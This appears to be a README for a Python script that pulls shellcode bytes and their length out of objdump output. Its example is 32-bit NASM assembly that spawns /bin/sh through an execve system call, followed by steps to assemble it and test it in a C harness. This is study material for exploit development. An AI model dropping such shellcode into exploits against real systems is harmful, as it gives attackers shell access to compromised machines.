
Python script to extract shellcode from object/executable files

Simple tool developed for study and research reasons, I hope it will be useful.
The goal is to extract the shellcode and its length from an object/binary file.

Update 2022

  • The script is for python 3
  • There is a shellcode tester for macos


Write assembly code, product an object file and the use this script in pipeline to objdump.


The example is on Linux, but shellcode-extractor works on macos too.
Let's write spwaning shell assembly code in spawnshell.asm (NASM)

	xor eax, eax,
	push eax
	push 0x68732f2f
	push 0x6e69622f
	mov ebx, esp
	push eax
	mov edx, esp
	push ebx
	mov ecx, esp
	mov al, 11
	int 0x80

Launch :

nobody@nobody:~$ nasm -f elf spawnshell.asm -o output.o

Now we can use our script:

nobody@nobody:~$ objdump -d output.o | python shellcode_extractor.py
Lenght: 25


Insert our shellcode into the empty string in shellcode_tester.c or shellcode_tester_macos.c, compile it with gcc and run (remember: on macos gcc is an alias for clang).

